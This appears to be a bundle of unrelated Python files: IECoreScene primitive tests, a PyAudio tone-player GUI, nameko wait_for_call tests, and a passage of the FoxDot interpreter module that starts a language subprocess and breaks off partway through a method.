# Copyright (c) 2008-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import unittest
import time
import threading
import imath
import tempfile
import shutil
import IECore
import IECoreScene
class PrimitiveTest( unittest.TestCase ) :
def test( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
self.assertEqual( m.inferInterpolation( 1 ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
self.assertEqual( m.inferInterpolation( 2 ), IECoreScene.PrimitiveVariable.Interpolation.Uniform )
self.assertEqual( m.inferInterpolation( 4 ), IECoreScene.PrimitiveVariable.Interpolation.Vertex )
self.assertEqual( m.inferInterpolation( 6 ), IECoreScene.PrimitiveVariable.Interpolation.FaceVarying )
self.assertEqual( m.inferInterpolation( 0 ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )
self.assertEqual( m.inferInterpolation( 10 ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )
self.assertEqual( m.inferInterpolation( IECore.FloatData( 1 ) ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
self.assertEqual( m.inferInterpolation( IECore.V3fVectorData( [ imath.V3f( 1 ) ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
self.assertEqual( m.inferInterpolation( IECore.FloatVectorData( [ 2, 3 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Uniform )
self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Vertex )
self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4, 5, 6 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.FaceVarying )
self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4, 5, 6, 7 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )
def testCopyFrom( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, IECore.FloatVectorData( [ 1, 2 ] ), IECore.IntVectorData( [ 1, 0, 1, 0, 1, 0 ] ) )
m2 = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 3, 2, 1 ] ) )
m2["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ) )
self.assertNotEqual( m, m2 )
m2.copyFrom( m )
self.assertEqual( m, m2 )
def testLoad( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3), imath.V3f(4) ] ) )
m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, IECore.FloatVectorData( [ 1, 2 ] ), IECore.IntVectorData( [ 1, 0, 1, 0, 1, 0 ] ) )
self.assertTrue( m.arePrimitiveVariablesValid() )
tempDir = tempfile.mkdtemp()
IECore.Writer.create( m, os.path.join( tempDir, "testPrimitiveLoad.cob" ) ).write()
m2 = IECore.Reader.create( os.path.join( tempDir, "testPrimitiveLoad.cob" ) ).read()
self.assertTrue( m2.arePrimitiveVariablesValid() )
self.assertEqual( m, m2 )
shutil.rmtree(tempDir)
def testHash( self ) :
hashes = []
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
hashes.append( m.hash() )
m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) )
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["b"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) )
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["a"].data[0] = 2
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["b"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) )
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["b"].indices[0] = 1
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
def testPrimitiveVariableDataValidity( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
# only vector data
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatData( 1 ) ) ) )
# constant can be anything
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ) ) ) )
# data size matches interpolation
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3, 4 ] ) ) ) )
# data size (not base size) matches interpolation
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3) ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3), imath.V3f(4) ] ) ) ) )
def testPrimitiveVariableIndicesValidity( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
# only vector data
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatData( 1 ), IECore.IntVectorData( [ 0 ] ) ) ) )
# constant needs to be vector data if there are indices
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
# indices must be in range
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 1 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 1 ] ) ) ) )
# indices size matches interpolation, regardless of data size
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0, 0 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0, 0, 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
# except for constant which can have any number of indices
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) ) ) )
def testVariableIndexedView( self ) :
IECoreScene.testVariableIndexedView()
@unittest.skipIf( IECore.TestUtil.inMacCI(), "Mac CI is too slow for reliable timing" )
def testCancelLoading( self ) :
strip = IECoreScene.MeshPrimitive.createPlane( imath.Box2f( imath.V2f( 0 ), imath.V2f( 100000, 1 ) ), imath.V2i( 1000000, 1 ) )
testData = IECore.FloatVectorData( [0] * ( len( strip["P"].data ) ) )
for i in range( 10 ):
q = IECore.FloatVectorData( testData )
q[0] = i
strip["var%i" % i] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, q )
saveIO = IECore.MemoryIndexedIO( IECore.CharVectorData(), IECore.IndexedIO.OpenMode.Write )
strip.save( saveIO, "test" )
loadIO = IECore.MemoryIndexedIO( saveIO.buffer(), IECore.IndexedIO.OpenMode.Read )
canceller = IECore.Canceller()
cancelled = [False]
def backgroundRun():
try:
IECore.Object.load( loadIO, "test", canceller )
except IECore.Cancelled:
cancelled[0] = True
thread = threading.Thread(target=backgroundRun, args=())
startTime = time.time()
thread.start()
time.sleep( 0.05 )
canceller.cancel()
thread.join()
self.assertLess( time.time() - startTime, 0.1 )
self.assertTrue( cancelled[0] )
if __name__ == "__main__":
unittest.main()
|
BlasterAmpTonePlayer.py
|
"""
**** This generates a High Quality 16 Bit Audio Tone Though a Sound Blaster USB Dongle *****
Code based on this Internet thread,
https://stackoverflow.com/questions/974071/python-library-for-playing-fixed-frequency-sound
The soundfile module (https://PySoundFile.readthedocs.io/) has to be installed!
The official installer is broken (as of March 2022), the install fix and replacement wheel file is shown here in this video,
https://www.youtube.com/watch?v=t6zdZIT4MNA
The fixed wheel files are here,
https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyaudio
Totally free script, but remember,
"Written by an infinite number of Monkeys in an infinite amount of time,
...so beware."
"""
#from tkinter.constants import FALSE
import pyaudio
import struct
import math
import threading
import time
import PySimpleGUI as sg
# Setup audio stream
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
# Instantiate PyAudio
pa = pyaudio.PyAudio()
# Global Flag
is_playing = False
# Local Methods
def data_for_tone(frequency: float, time: float = 1.0, volume: float = 1.0):
"""get frames for a fixed-frequency tone lasting `time` seconds
at the given volume (0.0 to 1.0)"""
frame_count = int(RATE * time)
# limit volume
if volume > 1.0:
volume = 1.0
remainder_frames = frame_count % RATE
wavedata = []
for i in range(frame_count):
a = RATE / frequency # number of frames per wave
b = i / a
# explanation for b
# considering one wave, what part of the wave should this be
# if we graph the sine wave in a
# displacement vs i graph for the particle
# where 0 is the beginning of the sine wave and
# 1 the end of the sine wave
# which part is "i" is denoted by b
# for clarity you might use
# though this is redundant since math.sin is a looping function
# b = b - int(b)
c = b * (2.0 * math.pi)
# explanation for c
# now we map b to between 0 and 2*math.PI
# since 0 - 2*PI, 2*PI - 4*PI, ...
# are the repeating domains of the sin wave (so the decimal values will
# also be mapped accordingly,
# and the integral values will be multiplied
# by 2*PI and since sin(n*2*PI) is zero where n is an integer)
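# illustrative worked example (numbers chosen here for clarity, not from the
# original): with RATE = 44100 and frequency = 441, a = 100 frames per wave,
# so at frame i = 25 we get b = 0.25 and c = pi/2, i.e. sin(c) = 1, the peak.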
d = math.sin(c) * 32767 * volume
e = int(d)
wavedata.append(e)
for i in range(remainder_frames):
wavedata.append(0)
number_of_bytes = str(len(wavedata))
wavedata = struct.pack(number_of_bytes + 'h', *wavedata)
return wavedata
def play():
# This is the actual play-loop thread
global is_playing
global stream
global frame_data
while is_playing:
stream.write(frame_data)
# Clean up streams on playing stop
stream.stop_stream()
stream.close()
def loop_start(frequency, volume):
global is_playing
global stream
global frame_data
if not is_playing:
frame_data = data_for_tone(frequency=frequency, time=1, volume=volume)
stream = pa.open(format=FORMAT, channels=CHANNELS,
rate=RATE, output=True)
is_playing = True
audio_loop_thread = threading.Thread(target=play)
audio_loop_thread.start()
def loop_stop():
global is_playing
is_playing = False
if __name__ == "__main__":
# GUI Layout Design
layout = [[sg.Text('Frequency Hz')],
[sg.Slider(orientation='horizontal', key='Frequency', enable_events=True, range=(1000, 10000), resolution=1000, default_value=2000, size=(60, 20))],
[sg.Text('')],
[sg.Text('Volume %')],
[sg.Slider(orientation='horizontal', key='Volume', enable_events=True, range=(1, 100), resolution=1, default_value=50, size=(60, 20))],
[sg.Text('')],
[sg.Button('Play', size=(10, 1)), sg.Button('Stop', size=(10, 1)), sg.Button('Exit', size=(10, 1))]
]
# GUI Window Design
window = sg.Window('Play A Tone With Python', layout,
default_element_size=(12, 1),
text_justification='l',
auto_size_text=False,
auto_size_buttons=False,
keep_on_top=True,
grab_anywhere=False,
default_button_element_size=(12, 1),
finalize=True)
# GUI Initial Conditions
window['Stop'].update(disabled=True)
# GUI Window Event Loop
while True:
# Read any window events
event, values = window.Read()
if event == 'Exit' or event == sg.WIN_CLOSED:
loop_stop()
break
if event == 'Play':
window['Stop'].update(disabled=False)
window['Play'].update(disabled=True)
frequency = int(values['Frequency'])
volume = float(values['Volume'] / 100.0)
loop_start(frequency, volume)
continue
if event == 'Stop':
window['Stop'].update(disabled=True)
window['Play'].update(disabled=False)
loop_stop()
continue
if event == 'Frequency':
window['Stop'].update(disabled=True)
window['Play'].update(disabled=False)
loop_stop()
continue
if event == 'Volume':
window['Stop'].update(disabled=True)
window['Play'].update(disabled=False)
loop_stop()
continue
# GUI Exit
window.Close()
# ----- Fini -----
|
test_waiting.py
|
import sys
import time
from threading import Thread
import pytest
from mock import ANY, Mock, call, patch
from nameko.testing.waiting import WaitResult, wait_for_call
@pytest.fixture
def forever():
value = [True]
yield value
value.pop()
class TestPatchWaitUseCases(object):
def test_wait_for_specific_result(self, forever):
class Counter(object):
value = 0
def count(self):
self.value += 1
return self.value
counter = Counter()
def count_forever():
while forever:
counter.count()
time.sleep(0)
def cb(args, kwargs, res, exc_info):
return res == 10
with wait_for_call(counter, 'count', callback=cb) as result:
Thread(target=count_forever).start()
assert result.get() == 10
def test_wait_until_called_with_argument(self, forever):
class CounterWithSet(object):
value = 0
def set(self, value):
self.value = value
return self.value
counter = CounterWithSet()
def increment_forever_via_set():
while forever:
counter.set(counter.value + 1)
time.sleep(0)
def cb(args, kwargs, res, exc_info):
return args == (10,)
with wait_for_call(counter, 'set', callback=cb) as result:
Thread(target=increment_forever_via_set).start()
assert result.get() == 10
def test_wait_until_raises(self, forever):
class LimitExceeded(Exception):
pass
class CounterWithLimit(object):
def __init__(self, limit):
self.value = 0
self.limit = limit
def count(self):
self.value += 1
if self.value >= self.limit:
raise LimitExceeded(self.limit)
return self.value
limit = 10
counter = CounterWithLimit(limit)
def count_forever():
while forever:
counter.count()
time.sleep(0)
def cb(args, kwargs, res, exc_info):
return exc_info is not None
with wait_for_call(counter, 'count', callback=cb) as result:
Thread(target=count_forever).start()
with pytest.raises(LimitExceeded):
result.get()
def test_wait_until_stops_raising(self, forever):
class ThresholdNotReached(Exception):
pass
class CounterWithThreshold(object):
def __init__(self, threshold):
self.value = 0
self.threshold = threshold
def count(self):
self.value += 1
if self.value < self.threshold:
raise ThresholdNotReached(self.threshold)
return self.value
threshold = 10
counter = CounterWithThreshold(threshold)
def count_forever():
while forever:
try:
counter.count()
except ThresholdNotReached:
pass
time.sleep(0)
def cb(args, kwargs, res, exc_info):
return exc_info is None
with wait_for_call(counter, 'count', callback=cb) as result:
Thread(target=count_forever).start()
assert result.get() == threshold
class TestPatchWait(object):
def test_direct(self):
class Echo(object):
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
with wait_for_call(echo, 'upper'):
res = echo.upper(arg)
assert res == "HELLO"
def test_indirect(self):
class Echo(object):
def proxy(self, arg):
return self.upper(arg)
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
with wait_for_call(echo, 'upper'):
assert echo.proxy(arg) == "HELLO"
def test_patch_class(self):
class Echo(object):
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
with wait_for_call(Echo, 'upper'):
res = echo.upper(arg)
assert res == "HELLO"
def test_result(self):
class Echo(object):
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
with wait_for_call(echo, 'upper') as result:
res = echo.upper(arg)
assert result.get() == res
def test_result_not_ready(self):
class Echo(object):
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
with wait_for_call(echo, 'upper') as result:
with pytest.raises(result.NotReady):
result.get()
res = echo.upper(arg)
assert result.get() == res
def test_result_is_none(self):
class Echo(object):
def nothing(self):
return None
echo = Echo()
with wait_for_call(echo, 'nothing') as result:
res = echo.nothing()
assert res is None
assert result.get() is None
assert result.has_result is True
def test_wrapped_method_raises(self):
class EchoException(Exception):
pass
class Echo(object):
def error(self):
raise EchoException("error!")
echo = Echo()
with wait_for_call(echo, 'error'):
with pytest.raises(EchoException):
echo.error()
def test_result_get_raises(self):
class EchoException(Exception):
pass
class Echo(object):
def error(self):
raise EchoException("error!")
echo = Echo()
with wait_for_call(echo, 'error') as result:
with pytest.raises(EchoException):
echo.error()
with pytest.raises(EchoException):
result.get()
def test_callback(self):
class Echo(object):
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
callback = Mock()
callback.return_value = True
with wait_for_call(echo, 'upper', callback):
res = echo.upper(arg)
assert res == "HELLO"
assert callback.called
assert callback.call_args_list == [call((arg,), {}, res, None)]
def test_callback_multiple_calls(self):
class Echo(object):
count = 0
def upper(self, arg):
self.count += 1
return "{}-{}".format(arg.upper(), self.count)
echo = Echo()
arg = "hello"
callback = Mock()
callback.side_effect = [False, True]
with wait_for_call(echo, 'upper', callback):
res1 = echo.upper(arg)
assert res1 == "HELLO-1"
res2 = echo.upper(arg)
assert res2 == "HELLO-2"
assert callback.called
assert callback.call_args_list == [
call((arg,), {}, res1, None),
call((arg,), {}, res2, None),
]
def test_callback_with_exception(self):
class EchoException(Exception):
pass
class Echo(object):
def error(self):
raise exc
echo = Echo()
exc = EchoException("error!")
callback = Mock()
callback.return_value = True
with wait_for_call(echo, 'error', callback):
with pytest.raises(EchoException):
echo.error()
assert callback.called
assert callback.call_args_list == [
call((), {}, None, (EchoException, exc, ANY))
]
def test_callback_with_exception_multiple_calls(self):
class EchoException(Exception):
pass
class Echo(object):
def error(self):
raise exc
echo = Echo()
exc = EchoException("error!")
callback = Mock()
callback.side_effect = [False, True]
with wait_for_call(echo, 'error', callback):
with pytest.raises(EchoException):
echo.error()
with pytest.raises(EchoException):
echo.error()
assert callback.called
assert callback.call_args_list == [
call((), {}, None, (EchoException, exc, ANY)),
call((), {}, None, (EchoException, exc, ANY))
]
def test_with_new_thread(self):
class Echo(object):
def proxy(self, arg):
Thread(target=self.upper, args=(arg,)).start()
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
callback = Mock()
callback.return_value = True
with wait_for_call(echo, 'upper', callback):
res = echo.proxy(arg)
assert res is None
assert callback.called
assert callback.call_args_list == [call((arg,), {}, "HELLO", None)]
def test_target_as_mock(self):
class Klass(object):
def __init__(self):
self.attr = "value"
def method(self):
return self.attr.upper()
instance = Klass()
with patch.object(instance, 'attr') as patched_attr:
with wait_for_call(patched_attr, 'upper'):
instance.method()
assert patched_attr.upper.called
assert instance.attr.upper.called
class TestWaitResult(object):
class CustomError(Exception):
pass
@pytest.fixture
def exc_info(self):
try:
raise self.CustomError("whoops")
except:
exc_info = sys.exc_info()
return exc_info
def test_has_result(self):
result = WaitResult()
assert result.has_result is False
result.send("ok", None)
assert result.has_result is True
def test_has_exception(self, exc_info):
result = WaitResult()
assert result.has_result is False
result.send(None, exc_info)
assert result.has_result is True
def test_send_multiple_times(self):
result = WaitResult()
result.send(1, None)
result.send(2, None)
assert result.get() == 1
def test_get_result_multiple_times(self):
result = WaitResult()
result.send(1, None)
assert result.get() == 1
assert result.get() == 1
def test_get_raises(self, exc_info):
result = WaitResult()
result.send(1, exc_info)
with pytest.raises(self.CustomError):
result.get()
|
interpreter.py
|
"""
Interpreter
-----------
Runs a block of FoxDot code. Designed to be overloaded
for other language communication
"""
from __future__ import absolute_import
from .config import *
from .message import MSG_CONSOLE
from subprocess import Popen
from subprocess import PIPE, STDOUT
from datetime import datetime
# Import OSC library depending on Python version
if PY_VERSION == 2:
from . import OSC
else:
from . import OSC3 as OSC
try:
broken_pipe_exception = BrokenPipeError
except NameError: # Python 2
broken_pipe_exception = IOError
CREATE_NO_WINDOW = 0x08000000 if SYSTEM == WINDOWS else 0
import sys
import re
import time
import threading
import shlex
import tempfile
import os, os.path
DATE_FORMAT = "%Y-%m-%d %H:%M:%S.%f"
def compile_regex(kw):
""" Takes a list of strings and returns a regex that
matches each one """
return re.compile(r"(?<![a-zA-Z.])(" + "|".join(kw) + ")(?![a-zA-Z])")
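# Example (illustrative): compile_regex(["Clock", "var"]) matches the whole word
# "Clock" in "Clock.clear()" but not inside "Clocked" or after a dot as in
# "my.Clock", thanks to the look-around assertions above.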
SEPARATOR = ":"; _ = " %s " % SEPARATOR
def colour_format(text, colour):
return '<colour="{}">{}</colour>'.format(colour, text)
## dummy interpreter
class DummyInterpreter:
name = None
def __init__(self, *args, **kwargs):
self.re={}
self.syntax_lang = langtypes[kwargs.get("syntax", -1)]
        # If using another syntax, use the appropriate regex
if self.syntax_lang != self.__class__:
self.re = {"tag_bold": self.syntax_lang.find_keyword, "tag_italic": self.syntax_lang.find_comment}
self.syntax_lang.setup()
else:
self.syntax_lang = None
def __repr__(self):
        return self.name if self.name is not None else repr(self.__class__.__name__)
def get_block_of_code(self, text, index):
""" Returns the start and end line numbers of the text to evaluate when pressing Ctrl+Return. """
# Get start and end of the buffer
start, end = "1.0", text.index("end")
lastline = int(end.split('.')[0]) + 1
        # Indices of block to execute
block = [0,0]
# 1. Get position of cursor
cur_x, cur_y = index.split(".")
cur_x, cur_y = int(cur_x), int(cur_y)
        # 2. Go backwards line by line to find the first line of the block
for line in range(cur_x, 0, -1):
if not text.get("%d.0" % line, "%d.end" % line).strip():
break
block[0] = line
# 3. Iterate forwards until we get two \n\n or index==END
for line in range(cur_x, lastline):
if not text.get("%d.0" % line, "%d.end" % line).strip():
break
block[1] = line
return block
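    # Example (illustrative): with the cursor anywhere inside a paragraph of
    # non-blank lines, the returned [start, end] pair covers that contiguous run
    # of non-blank lines, i.e. the block delimited by blank lines.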
def evaluate(self, string, *args, **kwargs):
self.print_stdin(string, *args, **kwargs)
return
def start(self):
return self
def stdout(self, *args, **kwargs):
pass
def kill(self, *args, **kwargs):
pass
def print_stdin(self, string, name=None, colour="White"):
""" Handles the printing of the execute code to screen with coloured
names and formatting """
# Split on newlines
string = [line.replace("\n", "") for line in string.split("\n") if len(line.strip()) > 0]
if len(string) > 0 and name is not None:
name = str(name)
print(colour_format(name, colour) + _ + string[0])
# Use ... for the remainder of the lines
n = len(name)
for i in range(1,len(string)):
sys.stdout.write(colour_format("." * n, colour) + _ + string[i])
sys.stdout.flush()
return
# Syntax highlighting methods
def find_keyword(self, string):
return self.syntax_lang.find_keyword(string)
def find_comment(self, string):
return self.syntax_lang.find_comment(string)
def stop_sound(self):
""" Returns the string for stopping all sound in a language """
        return self.syntax_lang.stop_sound() if self.syntax_lang is not None else ""
@staticmethod
def format(string):
""" Method to be overloaded in sub-classes for formatting strings to be evaluated """
return str(string) + "\n"
class Interpreter(DummyInterpreter):
id = 99
lang = None
clock = None
boot_file = None
keyword_regex = compile_regex([])
comment_regex = compile_regex([])
stdout = None
stdout_thread = None
filetype = ".txt"
client = None
def __init__(self, client, path, args=""):
self.client = client
self.re = {"tag_bold": self.find_keyword, "tag_italic": self.find_comment}
self.path = shlex.split(path)
self.args = self._get_args(args)
self.f_out = tempfile.TemporaryFile("w+", 1) # buffering = 1
self.is_alive = True
self.setup()
@staticmethod
def _get_args(args):
if isinstance(args, str):
args = shlex.split(args)
elif isinstance(args, list) and len(args) == 1:
args = shlex.split(args[0])
return args
def setup(self):
""" Overloaded in sub-classes """
return
def start(self):
""" Opens the process with the interpreter language """
try:
self.lang = Popen(self.path + self.args, shell=False, universal_newlines=True, bufsize=1,
stdin=PIPE,
stdout=self.f_out,
stderr=self.f_out,
creationflags=CREATE_NO_WINDOW)
self.stdout_thread = threading.Thread(target=self.stdout)
self.stdout_thread.start()
except OSError:
raise ExecutableNotFoundError(self.get_path_as_string())
self.load_bootfile()
return self
def load_bootfile(self):
"""
        Loads the boot file for this interpreter. The default is defined
        on the class but can be overridden in conf/boot.txt.
"""
self.boot_file = self.get_custom_bootfile()
# Load data
if self.boot_file is not None:
with open(self.boot_file) as f:
                for line in f.read().split("\n"):
self.lang.stdin.write(line.rstrip() + "\n")
self.lang.stdin.flush()
return
def get_custom_bootfile(self):
"""
Get the path of a specific custom bootfile or None if it
does not exist.
"""
# Check boot file for overload
if self.name is not None and os.path.exists(BOOT_CONFIG_FILE):
with open(BOOT_CONFIG_FILE) as f:
for line in f.readlines():
if line.startswith(self.name):
data = line.split("=")
path = data[-1].strip()
if path not in ("''", '""'):
return path
return None
def get_path_as_string(self):
""" Returns the executable input as a string """
return " ".join(self.path)
@classmethod
def find_keyword(cls, string):
return [(match.start(), match.end()) for match in cls.keyword_regex.finditer(string)]
@classmethod
def find_comment(cls, string):
return [(match.start(), match.end()) for match in cls.comment_regex.finditer(string)]
def write_stdout(self, string):
if self.is_alive:
self.lang.stdin.write(self.format(string))
self.lang.stdin.flush()
return
def evaluate(self, string, *args, **kwargs):
""" Sends a string to the stdin and prints the text to the console """
# TODO -- get control of stdout
# Print to console
self.print_stdin(string, *args, **kwargs)
# Pipe to the subprocess
self.write_stdout(string)
return
def stdout(self, text=""):
""" Continually reads the stdout from the self.lang process """
while self.is_alive:
            if self.lang.poll() is not None:
self.is_alive = False
break
try:
# Check contents of file
